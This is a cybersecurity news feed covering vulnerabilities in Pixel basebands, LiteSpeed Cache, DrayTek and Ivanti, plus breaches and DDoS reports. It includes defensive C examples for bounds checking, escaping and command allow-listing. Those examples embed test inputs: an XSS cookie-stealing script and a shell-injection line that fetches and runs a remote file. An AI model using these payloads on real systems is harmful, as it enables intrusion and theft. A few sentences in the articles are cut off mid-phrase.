Security Affairs (https://securityaffairs.com/category/security): Read, think, share … Security is everyone's responsibility. Feed last updated Sun, 06 Oct 2024 13:16:39 +0000.

https://securityaffairs.com/169427/malware/security-affairs-malware-newsletter-round-14.html (published Sun, 06 Oct 2024 13:16:37 +0000)

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape.


Follow me on Twitter and Mastodon

(SecurityAffairs – hacking, malware)

https://securityaffairs.com/169402/security/google-pixel-9-mitigates-baseband-attacks.html (published Sun, 06 Oct 2024 08:44:36 +0000)

Google announced that the Pixel 9 ships with new security features, including hardening measures designed to mitigate attacks against the cellular baseband.

Pixel phones are known for their strong security features, particularly in protecting the cellular baseband, the processor that handles LTE, 4G, and 5G communications. Smartphone basebands are often an attractive target because performance constraints have historically kept them from adopting common exploit mitigations; Pixel has been hardening its baseband for years. Google claims that the Pixel 9 implements its most secure baseband to date, addressing a critical attack vector that researchers have repeatedly demonstrated.

The cellular baseband manages a smartphone's network connectivity and processes inputs from outside the device, including from untrusted sources. In the past, researchers have documented multiple attacks that target mobile devices through the baseband. Threat actors can carry out these kinds of attacks remotely through protocols like IMS.

“malicious actors can [...]. In certain protocols like IMS (IP Multimedia Subsystem), this can be executed remotely from any global location using an IMS client.” reads the announcement.

Baseband firmware can be affected by vulnerabilities, making it a significant attack vector. Exploiting baseband bugs can lead to remote code execution.

Experts warn that most smartphone basebands lack the exploit mitigations that are standard elsewhere in software development. Zero-day brokers and similar actors can exploit these vulnerabilities to target mobile users and deploy malware. Baseband exploits are frequently listed in exploit marketplaces with relatively low payouts, an indication that exploitable bugs are plentiful. In response, Android and Pixel have strengthened their Vulnerability Rewards Program, prioritizing the identification and resolution of connectivity firmware vulnerabilities.

Pixel has added proactive defenses over the years. The key security measures implemented in the Pixel 9 series include:

  • Bounds Sanitizer: Prevents memory corruption by checking at runtime that array accesses stay within bounds.
  • Integer Overflow Sanitizer: Traps on integer overflows (for example, in length calculations) before they can lead to memory corruption.
  • Stack Canaries: Detects stack buffer overflows before a corrupted return address can be used.
  • Control Flow Integrity (CFI): Restricts indirect control transfers to approved targets, blocking hijacked control flow.
  • Auto-Initialize Stack Variables: Zero-initializes stack variables so uninitialized memory cannot be read or leaked.

Additionally, bug detection tools are used during testing to find and patch bugs before the firmware ships.
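The mitigations listed above are compiler- and runtime-level defences for C code of the following shape. This is an added example, not Google's or any vendor's baseband code: a minimal TLV (tag, 16-bit length, value) record parser of the kind a baseband runs over network-supplied bytes, with the length check written once the way such bugs typically look and once the way the hardening assumes it to be written. The record layout, the MAX_VALUE buffer size and the return codes are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical fixed-size destination for a record's value bytes. */
#define MAX_VALUE 16

struct tlv {
    uint8_t tag;
    size_t len;
    uint8_t value[MAX_VALUE];
};

/* The bug pattern: offset + declared_len is computed in size_t and wraps when
 * the network-supplied length is close to SIZE_MAX, so the check passes and a
 * later copy reads past the message. Unsigned wrap is defined behaviour in C,
 * so nothing stops it unless the integer overflow sanitizer
 * (-fsanitize=unsigned-integer-overflow) is compiled in to trap it. */
int tlv_fits_unsafe(size_t offset, size_t declared_len, size_t msg_len)
{
    size_t end = offset + declared_len;
    return end <= msg_len;
}

/* Hardened: make the wrap explicit and treat it as a malformed record. */
int tlv_fits_safe(size_t offset, size_t declared_len, size_t msg_len)
{
    size_t end;
    if (__builtin_add_overflow(offset, declared_len, &end))
        return 0;
    return end <= msg_len;
}

/* Parse one record: tag (1 byte), big-endian length (2 bytes), value.
 * Returns 0 on success, -1 on a short header, -2 when the declared length
 * runs past the message, -3 when it would not fit in out->value. The output
 * is zeroed first (what -ftrivial-auto-var-init=zero does for stack locals),
 * and the copy is bounded by both the input and the destination, a check the
 * bounds sanitizer cannot do for memcpy on its own. */
int tlv_parse(const uint8_t *msg, size_t msg_len, struct tlv *out)
{
    memset(out, 0, sizeof *out);
    if (msg == NULL || msg_len < 3)
        return -1;
    size_t off = 3;
    size_t len = ((size_t)msg[1] << 8) | msg[2];
    out->tag = msg[0];
    if (!tlv_fits_safe(off, len, msg_len))
        return -2;
    if (len > MAX_VALUE)
        return -3;
    memcpy(out->value, msg + off, len);
    out->len = len;
    return 0;
}

int main(void)
{
    struct tlv rec;
    /* Constructed inputs: a well-formed record and one whose declared length
     * (0xFFFF) is far larger than the bytes actually received. */
    const uint8_t good[] = {0x01, 0x00, 0x03, 'a', 'b', 'c'};
    const uint8_t truncated[] = {0x01, 0xFF, 0xFF, 'a'};

    int rc = tlv_parse(good, sizeof good, &rec);
    printf("good record      -> %d (tag %u, len %zu)\n", rc, rec.tag, rec.len);
    printf("truncated record -> %d\n", tlv_parse(truncated, sizeof truncated, &rec));
    printf("unsafe check on a wrapping length passes: %d\n",
           tlv_fits_unsafe(3, SIZE_MAX - 1, 10));
    printf("safe check on the same length passes:    %d\n",
           tlv_fits_safe(3, SIZE_MAX - 1, 10));
    return 0;
}
```

Build with clang and `-fsanitize=bounds,unsigned-integer-overflow -fstack-protector-strong -ftrivial-auto-var-init=zero` to see the first three list items at work: the integer sanitizer traps the wrap inside tlv_fits_unsafe, the canary catches a smashed return address, and the zero-init flag does for every local what the memset does here explicitly. `-fsanitize=bounds` only instruments indexed array accesses, which is why the explicit `len > MAX_VALUE` check in front of memcpy is still needed. CFI requires link-time optimisation (`-flto -fsanitize=cfi -fvisibility=hidden`) and is left out of this single-file build.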

“Security hardening is difficult and our work is never done, but when these security measures are combined, they significantly increase Pixel 9’s resilience to baseband attacks.” concludes the announcement. “Pixel’s proactive approach to security demonstrates a commitment to protecting its users across the entire software stack. Hardening the cellular baseband against remote attacks is just one example of how Pixel is constantly working to stay ahead of the curve when it comes to security.”

(SecurityAffairs – hacking, Google Pixel)
https://securityaffairs.com/169390/security/wordpress-litespeed-cache-plugin-flaw-site-takeover.html (published Sat, 05 Oct 2024 13:48:37 +0000)

A high-severity flaw in the WordPress LiteSpeed Cache plugin could allow attackers to execute arbitrary JavaScript code under certain conditions.

A high-severity security flaw, tracked as CVE-2024-47374 (CVSS score 7.2), in the LiteSpeed Cache plugin for WordPress could allow attackers to execute arbitrary JavaScript.

The vulnerability is a stored cross-site scripting (XSS) issue impacting versions up to 6.5.0.2.

The LiteSpeed Cache plugin is an all-in-one site acceleration tool that offers server-level caching and optimization features. It supports WordPress Multisite and is compatible with popular plugins such as WooCommerce, bbPress, and Yoast SEO. With over six million active installations, site admins should address the issue as soon as possible.

The vulnerability was originally reported by an external security researcher.

“This plugin suffers from an unauthenticated stored XSS vulnerability. It could allow any unauthenticated user to do anything from stealing sensitive information to, in this case, privilege escalation on the WordPress site by performing a single HTTP request.” reads the advisory.

The flaw arises from improper sanitization of the “X-LSCACHE-VARY-VALUE” HTTP header, allowing arbitrary script injection. The issue could be exploited only if the “CSS Combine” and “Generate UCSS” settings are enabled.

An attacker could exploit this vulnerability with a single HTTP request to hijack the account of a user who views the injected notice. The most damaging scenario is when the hijacked account belongs to a site administrator, because it allows the threat actor to take full control of the website and stage further attacks.

The vulnerability was addressed in version 6.5.1, released on September 25, 2024.

“We recommend applying escaping and sanitization to any message that will be displayed as an admin notice. Depending on the context of the data, we recommend using [...] to sanitize value for HTML output (outside of HTML attribute) or [...]. For escaping values inside of attributes, you can use the [...] function.” concludes the report. “We also recommend applying a proper permission or authorization check to the registered rest route endpoints.”

In early September, the developer behind the LiteSpeed Cache plugin addressed another unauthenticated account takeover vulnerability, tracked as CVE-2024-44000 (CVSS score: 7.5), that can allow any visitor to take over the sessions of logged-in users and potentially escalate privileges to the Administrator level. An attacker with an administrator session can, for example, upload malicious plugins.

Patchstack researchers explained that the flaw stems from an HTTP response header leak that exposed “Set-Cookie” headers in a debug log file (/wp-content/debug.log) after login attempts.

An unauthenticated attacker who can read the log file obtains sensitive information, including the session cookies carried in HTTP response headers, and can use any still-valid session to log in as that user. The flaw can be exploited only if the WordPress site's debug feature is enabled; it is disabled by default.

“The vulnerability exploits an HTTP response headers leak on the debug log file which also leaks the “Set-Cookie” header after the users perform a login request.” reads the advisory published by Patchstack. “The main vulnerable code exists on the function ended

The vulnerability CVE-2024-44000 impacts versions before and including 6.4.1. The issue has been addressed in version 6.5.0.1.
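Both LiteSpeed Cache bugs above come down to treating HTTP header data as trusted: CVE-2024-47374 rendered a request header into an admin notice without escaping, and CVE-2024-44000 wrote response headers, Set-Cookie included, verbatim into debug.log. The following is an added example, not LiteSpeed's or WordPress's code, showing the two handling rules in C: escape before emitting into HTML, and redact credential-bearing headers before logging, with a small detector for logs that already contain them. The notice markup, buffer sizes and the log excerpt are constructed for the example.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Escape a string for an HTML text or double-quoted attribute context.
 * Returns the number of bytes written (excluding the terminator), or -1 if
 * out is too small, in which case out is left empty rather than holding a
 * truncated, possibly half-escaped entity. */
int html_escape(const char *in, char *out, size_t out_len)
{
    size_t used = 0;
    if (out_len == 0)
        return -1;
    for (; *in; in++) {
        char one[2] = {*in, '\0'};
        const char *rep;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#039;"; break;
        default:   rep = one;      break;
        }
        size_t n = strlen(rep);
        if (used + n >= out_len) {
            out[0] = '\0';
            return -1;
        }
        memcpy(out + used, rep, n);
        used += n;
    }
    out[used] = '\0';
    return (int)used;
}

/* Render the admin notice either the way the vulnerable path did (the header
 * value interpolated as-is) or the way the fix does (escaped first).
 * Returns 0 on success, -1 if a buffer is too small. The markup is invented. */
int render_notice(const char *vary_value, int escaped, char *out, size_t out_len)
{
    char safe[256];
    const char *v = vary_value;
    if (escaped) {
        if (html_escape(vary_value, safe, sizeof safe) < 0)
            return -1;
        v = safe;
    }
    int n = snprintf(out, out_len, "<div class=\"notice\">Vary value: %s</div>", v);
    return (n < 0 || (size_t)n >= out_len) ? -1 : 0;
}

/* Case-insensitive prefix match; HTTP header names are case-insensitive. */
static int starts_with_icase(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return 0;
    return 1;
}

/* Redact the value of a Cookie or Set-Cookie header line before it is written
 * to a log. Returns 1 if redacted, 0 if copied unchanged, -1 if out is too small. */
int redact_cookie_header(const char *line, char *out, size_t out_len)
{
    static const char *const names[] = {"Set-Cookie:", "Cookie:"};
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        if (starts_with_icase(line, names[i])) {
            int n = snprintf(out, out_len, "%.*s [REDACTED]", (int)strlen(names[i]), line);
            return (n < 0 || (size_t)n >= out_len) ? -1 : 1;
        }
    }
    if (strlen(line) >= out_len)
        return -1;
    strcpy(out, line);
    return 0;
}

/* Detection side: count Set-Cookie lines that made it into a debug log. */
int count_leaked_cookies(const char *const lines[], size_t n_lines)
{
    int hits = 0;
    for (size_t i = 0; i < n_lines; i++)
        if (starts_with_icase(lines[i], "Set-Cookie:"))
            hits++;
    return hits;
}

int main(void)
{
    char notice[512], logged[256];
    /* Constructed attacker-controlled header value. */
    const char *payload = "<script>alert(document.cookie)</script>";
    render_notice(payload, 0, notice, sizeof notice);
    printf("vulnerable: %s\n", notice);
    render_notice(payload, 1, notice, sizeof notice);
    printf("hardened:   %s\n", notice);

    /* Constructed debug.log excerpt in the shape of a login response. */
    const char *const debug_log[] = {
        "[04-Oct-2024 12:00:00 UTC] POST /wp-login.php 302",
        "Set-Cookie: wordpress_logged_in_1a2b=admin%7C1700000000%7Cdeadbeef; path=/; HttpOnly",
        "Content-Type: text/html; charset=UTF-8",
    };
    printf("leaked session cookies: %d\n", count_leaked_cookies(debug_log, 3));
    redact_cookie_header(debug_log[1], logged, sizeof logged);
    printf("logged as: %s\n", logged);
    return 0;
}
```

The escaper refuses to emit a partial result on overflow because a half-written entity such as `&l` is exactly the kind of output a filter bypass feeds on; the same "reject, don't truncate" rule applies to the redactor. Running count_leaked_cookies over an existing debug.log is a quick way to tell whether a site that had WP_DEBUG on before updating past 6.4.1 needs its sessions invalidated.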

(SecurityAffairs – hacking, WordPress)
https://securityaffairs.com/169381/mobile-2/apple-ios-18-0-1.html (published Sat, 05 Oct 2024 05:59:07 +0000)

Apple released the iOS 18.0.1 update, which addresses two vulnerabilities that could expose saved passwords and audio snippets to attackers.

Apple released updates to fix two vulnerabilities, tracked as CVE-2024-44207 and CVE-2024-44204.

CVE-2024-44207 may allow threat actors to capture short snippets of audio messages in Messages before the microphone indicator is activated. The company addressed the issue with improved checks; it was reported by Michael Jimenez and an anonymous researcher.

CVE-2024-44204 is a logic issue that could enable VoiceOver to read aloud users' saved passwords. The issue was addressed with improved validation and was reported by the researcher Bistrit Dahal.

Apple is not aware of attacks in the wild exploiting either vulnerability.

(SecurityAffairs – hacking)
https://securityaffairs.com/169362/security/google-removed-kaspersky-apps-from-the-play-store.html (published Fri, 04 Oct 2024 20:18:32 +0000)

Google removed Kaspersky's Android security apps from the Play Store and suspended the company's developer accounts over the weekend.

Over the weekend, all the Android products designed by the Russian cybersecurity firm Kaspersky were removed from the official Google Play in the United States and other countries.

Google also suspended the developer accounts used by the cybersecurity firm.

A Kaspersky employee who uses the handle MedvedevUnited confirmed on the company's official forum that downloads and updates of Kaspersky products are temporarily unavailable on the Google Play store.

“The downloads and updates of Kaspersky products are temporarily unavailable on the Google Play store.” reads the forum post. “Kaspersky is currently investigating the circumstances behind the issue and exploring potential solutions to ensure that users of its products can continue downloading and updating their applications from Google Play. We apologize for any inconvenience this may cause.”

The Kaspersky employee suggests customers continue downloading and updating Kaspersky products from other mobile stores, including Galaxy Store, Huawei AppGallery, and Xiaomi GetApps.

In July 2024, Kaspersky announced its exit from the U.S. market following the ban imposed by the Commerce Department.

In June, the Biden administration announced the ban on the sale of Kaspersky antivirus software in the United States, citing national security risks posed by Russia. The new rule leverages powers established during the Trump administration.

The Commerce Department’s Bureau of Industry and Security banned the Russian cybersecurity firm because it is based in Russia.

Government experts believe that the influence of the Kremlin over the company poses a significant risk. Russia-linked actors could abuse the software's privileged access to a computer system to steal sensitive information from American computers or spread malware, Commerce Secretary Gina Raimondo said on a briefing call with reporters on Thursday.

“Russia has shown it has the capacity and… the intent to exploit Russian companies like Kaspersky to collect and weaponize the personal information of Americans and that is why we are compelled to take the action that we are taking today,” Raimondo said on the call.

This isn’t the first time Western governments have banned Kaspersky, but the Russian firm has always denied any link with the Russian government.

Reuters reported that the U.S. government plans to add three units of the cybersecurity company to a trade restriction list. The move will significantly impact the company’s sales in the U.S. and potentially in other Western countries that may adopt similar restrictions against the security firm.

Google confirmed that it blocked Kaspersky and its products on the Play Store following restrictions imposed by the U.S. Department of Commerce’s Bureau of Industry and Security.

Below is Google's statement:

“The U.S. Department of Commerce’s Bureau of Industry and Security recently announced a variety of restrictions on Kaspersky. As a result, we have removed Kaspersky’s apps from Google Play,”

(SecurityAffairs – hacking, Google)
https://securityaffairs.com/169328/hacking/dutch-police-breached-by-state-actor.html (published Thu, 03 Oct 2024 21:27:34 +0000)

The Dutch government blames a “state actor” for hacking a police system, exposing the contact details of all police officers, according to the justice minister.

The Dutch police blame a state actor for the recent data breach that exposed officers’ contact details, the justice minister told lawmakers.

The incident took place on September 26, 2024, and the police have reported the security breach to the Data Protection Authority.

Threat actors broke into a police system and gained access to the work-related contact details of multiple officers. The attackers had access to names, email addresses, phone numbers and, in some cases, other private information belonging to police officers.

“Last week it became known that a police account was hacked. Work-related contact details of police officers were stolen.” reads the data breach notice published by Dutch police. “Apart from the names of colleagues, it does not concern private data or research data. Specialists within the police are investigating the impact of the incident.”

The police state that internal cyber specialists are investigating the security breach and the investigation is still ongoing. The Dutch police announced that they have identified the attackers, however, they haven’t publicly attributed it to a specific actor.

“The police have been informed by the intelligence services that it is very likely a ‘state actor’, in other words: another country or perpetrators on behalf of another country.” reads the update on the data breach published by the Dutch police. “Based on the information from the intelligence services, the police immediately implemented strong security measures against this attack. In order not to make the perpetrators any wiser and not to harm further investigation, no more can be said at this time.”

Dutch intelligence agencies believe it is highly likely that a state actor was behind the recent police data breach. Justice Minister David van Weel assured lawmakers that police and national security partners are working to protect impacted officers and prevent further damage.

“Nine Kooiman, chair of the Netherlands Police Union, called the hack ‘a nightmare. It is now important to protect data, protect colleagues’ and track down the perpetrators.” reported the Associated Press.

(SecurityAffairs – hacking, Dutch police)
https://securityaffairs.com/169305/hacking/new-record-breaking-ddos-attack-3-8-tbps.html (published Thu, 03 Oct 2024 13:01:17 +0000)

Cloudflare recently mitigated a new record-breaking DDoS attack, peaking at 3.8 Tbps and 2.14 billion packets per second (Pps).

Cloudflare reported that, starting in early September, it has mitigated over 100 hyper-volumetric L3/4 DDoS attacks, many exceeding 2 billion Pps and 3 Tbps. The largest peaked at 3.8 Tbps, the largest ever publicly disclosed.

“Cloudflare's defenses mitigated over one hundred hyper-volumetric L3/4 DDoS attacks throughout the month, with many exceeding 2 billion packets per second (Bpps) and 3 terabits per second (Tbps). The largest attack peaked at 3.8 Tbps — the largest ever disclosed publicly by any organization. Detection and mitigation was fully autonomous” reads the report published by Cloudflare.

The company pointed out that it has detected and mitigated the attack with its automated processes.

The scale and frequency of recent DDoS attacks are unprecedented, with experts warning they could overwhelm unprotected internet infrastructure.

The campaign, which started in September, targets the financial, internet, and telecom industries. The attacks predominantly use UDP traffic originating from compromised devices worldwide, with major sources in Vietnam, Russia, Brazil, Spain, and the US.

The experts noticed that the high packet rate attacks are generated by compromised MikroTik devices, DVRs, and web servers, while the high bitrate attacks are linked to compromised ASUS routers, likely taken over through a critical vulnerability (CVSS score of 9.8) in ASUS routers.

The previous record-breaking volumetric DDoS attack was reported by Microsoft in late 2021, with a packet rate of 340 million Pps. Cloudflare's own previous record was lower.

“The scale and frequency of these attacks are unprecedented. Due to their sheer size and bits/packets per second rates, these attacks have the ability to take down unprotected Internet properties, as well as Internet properties that are protected by on-premise equipment or by cloud providers that just don’t have sufficient network capacity or global coverage to be able to handle these volumes alongside legitimate traffic without impacting performance.” concludes Cloudflare. “Cloudflare, however, does have the network capacity, global coverage, and intelligent systems needed to absorb and automatically mitigate these monstrous attacks.”

(SecurityAffairs – hacking, DDoS attack)
https://securityaffairs.com/169288/digital-id/telegramshared-u-s-user-data-with-law-enforcement.html (published Thu, 03 Oct 2024 05:11:07 +0000)

Telegram fulfilled over a dozen U.S. law enforcement data requests this year, potentially revealing the IP addresses or phone numbers of 100+ users.

Independent website 404 Media first revealed that in 2024 Telegram fulfilled more than a dozen law enforcement data requests from U.S. authorities.

In doing so, the messaging platform potentially revealed the IP addresses or phone numbers of more than 100 users to law enforcement.

In the past, Telegram claimed that it had never supported law enforcement investigations; however, it recently updated its privacy policy to allow data sharing with authorities.

At the end of September, Telegram updated its privacy policy informing users that it will share users’ phone numbers and IP addresses with law enforcement in response to valid legal requests.

The company's CEO, Pavel Durov, announced the policy update. Telegram will comply with requests from law enforcement if the user under investigation is found to be violating the platform's rules.

“If Telegram receives a valid order from the relevant judicial authorities that confirms you're a suspect in a case involving criminal activities that violate the Telegram Terms of Service, we will perform a legal analysis of the request and may disclose your IP address and phone number to the relevant authorities. If any data is shared, we will include such occurrences in a quarterly transparency report published at: https://t.me/transparency.” reads the updated privacy policy.

In a message on its Telegram Channel, Durov revealed that over the last few weeks, a dedicated team of moderators, leveraging AI, has worked on its platform to identify and remove problematic content from the app.

The company announced that data shared with authorities will be disclosed in its quarterly transparency reports, accessible via a Telegram bot.

According to the “Transparency report for the period 01.01.24–30.09.24,” the number of “Fulfilled requests from the United States of America for IP address and/or phone number: 14. Affected users: 108.” Some of these requests likely predate the arrest of Telegram's CEO in France in August 2024.

(Source: 404 Media)

“For example, in Brazil, we disclosed data for 75 legal requests in Q1 (January-March) 2024, 63 in Q2, and 65 in Q3. In India, our largest market, we satisfied 2461 legal requests in Q1, 2151 in Q2, and 2380 in Q3.” Durov wrote on his Telegram channel. “In Europe, there was an uptick in the number of valid legal requests we received in Q3. This increase was caused by the fact that more EU authorities started to use the correct communication line for their requests, the one mandated by the EU DSA law. Information about this contact point has been publicly available to anyone who viewed the Telegram website or googled “Telegram EU address for law enforcement” since early 2024.”

Despite the 404 Media report, at the time of this writing I am not able to retrieve the report from the bot.

(SecurityAffairs – hacking, Telegram)
https://securityaffairs.com/169279/security/u-s-cisa-adds-ivanti-epm-flaw-known-exploited-vulnerabilities-catalog.html (published Wed, 02 Oct 2024 19:29:45 +0000)

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Endpoint Manager (EPM) vulnerability to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the Ivanti Endpoint Manager (EPM) SQL injection vulnerability, tracked as CVE-2024-29824 (CVSS score of 9.6), to its Known Exploited Vulnerabilities (KEV) catalog.

In May, Ivanti released security patches to address multiple critical vulnerabilities in Endpoint Manager (EPM), including CVE-2024-29824.

The vulnerability is an unspecified SQL Injection issue in Core server of Ivanti EPM 2022 SU5 and prior. An unauthenticated attacker within the same network could exploit the vulnerability to execute arbitrary code.

At the time of its disclosure, the company reported that it was not aware of attacks in the wild exploiting the vulnerability.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts also recommend that private organizations review the catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix this vulnerability by October 23, 2024.

(SecurityAffairs – hacking)
https://securityaffairs.com/169267/security/draytek-routers-flaws-impacts-700000-devices.html (published Wed, 02 Oct 2024 18:11:33 +0000)

Multiple flaws in DrayTek residential and enterprise routers can be exploited to fully compromise vulnerable devices.

Forescout researchers discovered 14 new vulnerabilities in DrayTek routers, two of which have been rated as critical. Of the 14 security flaws nine are rated high, and three are rated medium in severity.

The flaws impact residential and enterprise routers manufactured by DrayTek that could be exploited to take over susceptible devices.

The experts reported that over 704,000 DrayTek routers are exposed online in 168 countries, posing a serious risk to customers.

Vulnerabilities in these devices could be exploited for cyber espionage, data theft, ransomware and DoS attacks. On September 18, 2024, the FBI dismantled a botnet that exploited three DrayTek CVEs, and CISA recently added two more to its Known Exploited Vulnerabilities catalog.

“Since 75% of these routers are used in commercial settings, the implications for business continuity and reputation are severe. A successful attack could lead to significant downtime, loss of customer trust and regulatory penalties, all of which fall squarely on a CISO’s shoulders.” reads the published by Forescout.

The most severe vulnerability, tracked as CVE-2024-41592 (CVSS score 10), is a buffer overflow that can be exploited for denial of service or remote code execution.

“The “GetCGI()” function in the Web UI, responsible for retrieving HTTP request data, is vulnerable to a buffer overflow when processing the query string parameters.” reads the advisory.

The second critical issue, tracked as CVE-2024-41585, is an OS command execution / VM escape vulnerability.

The “recvCmd” binary, which facilitates communication between the host and guest operating systems, is vulnerable to OS command injection attacks.
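The following is an added example, not DrayTek's firmware, that shows the shape of a host/guest command channel like the one described for “recvCmd” written the way such binaries are usually written (the received line is formatted into a shell command) and the way it should be (tokenised, checked against an allow-list, rejected on any shell metacharacter, and handed to execv()-style execution with no shell in between). The command names, the token alphabet and the return codes are assumptions; nothing here executes anything.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_ARGS 8
#define MAX_ARG_LEN 32

/* The vulnerable pattern: the guest-supplied line becomes part of a shell
 * command. A line such as "ping 127.0.0.1; sh /tmp/x" runs both commands on
 * the host. This function only builds the string so the shape is visible;
 * nothing here calls system(). */
int build_shell_command_unsafe(const char *guest_line, char *out, size_t out_len)
{
    int n = snprintf(out, out_len, "/bin/sh -c \"%s\"", guest_line);
    return (n < 0 || (size_t)n >= out_len) ? -1 : 0;
}

/* Hypothetical allow-list of commands the guest may ask the host to run. */
static const char *const allowed_cmds[] = {"ping", "ifconfig", "uptime"};

/* Hardened: split guest_line into an argv vector, accept only the characters
 * [A-Za-z0-9._:/-] (so no quotes, $, `, ;, |, &, newlines or embedded
 * spaces), require argv[0] to be on the allow-list and NULL-terminate argv so
 * it can go straight to execv()/execvp(), which never involves a shell.
 * Returns argc, or -1 (command not allowed or empty line), -2 (bad character
 * or overlong token), -3 (too many tokens). Per-command argument validation
 * (for example rejecting unexpected flags) is still the caller's job. */
int parse_guest_command(const char *guest_line,
                        char argv_buf[MAX_ARGS][MAX_ARG_LEN],
                        char *argv[MAX_ARGS + 1])
{
    int argc = 0;
    const char *p = guest_line;

    while (*p) {
        while (*p == ' ')
            p++;
        if (!*p)
            break;
        if (argc == MAX_ARGS)
            return -3;
        size_t len = 0;
        while (*p && *p != ' ') {
            unsigned char c = (unsigned char)*p;
            if (!(isalnum(c) || c == '.' || c == '_' || c == ':' || c == '/' || c == '-'))
                return -2;
            if (len + 1 >= MAX_ARG_LEN)
                return -2;
            argv_buf[argc][len++] = (char)c;
            p++;
        }
        argv_buf[argc][len] = '\0';
        argv[argc] = argv_buf[argc];
        argc++;
    }
    if (argc == 0)
        return -1;
    int allowed = 0;
    for (size_t i = 0; i < sizeof allowed_cmds / sizeof allowed_cmds[0]; i++)
        if (strcmp(argv[0], allowed_cmds[i]) == 0)
            allowed = 1;
    if (!allowed)
        return -1;
    argv[argc] = NULL;
    return argc;
}

int main(void)
{
    char argv_buf[MAX_ARGS][MAX_ARG_LEN];
    char *argv[MAX_ARGS + 1];
    char cmd[256];
    /* Constructed guest messages: a benign one and an injection attempt. */
    const char *benign = "ping -c 1 192.0.2.1";
    const char *injected = "ping 127.0.0.1; wget http://203.0.113.5/x -O /tmp/x; sh /tmp/x";

    build_shell_command_unsafe(injected, cmd, sizeof cmd);
    printf("unsafe path would run: %s\n", cmd);
    printf("hardened verdict on injection: %d\n", parse_guest_command(injected, argv_buf, argv));
    int argc = parse_guest_command(benign, argv_buf, argv);
    printf("hardened verdict on benign: argc=%d, argv[0]=%s\n", argc, argv[0]);
    return 0;
}
```

The allow-list plus a positive character class is what makes this hold up: a deny-list of metacharacters is the approach that tends to miss one (newline, `$()`, backtick, or a quote that closes the `-c` string early), and escaping the line for the shell is fragile for the same reason. A real implementation would also resolve argv[0] to an absolute path and drop privileges before the exec.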

DrayTek has already released security updates to address the vulnerabilities reported by Forescout.

At this time, the company is not aware of attacks in the wild exploiting the above vulnerabilities.

“While the extent of these findings was beyond expectation, it was not entirely surprising. DrayTek is among many vendors that do not appear to conduct the necessary variant analysis and post-mortem analysis after vulnerability reports — which could lead to long-term improvements.” concludes the report. “Compared to our research on OT, we found a smaller percentage of unpatched and end-of-life IT routers in DrayTek compared to OT routers (Sierra Wireless).”

(SecurityAffairs – hacking, IoT)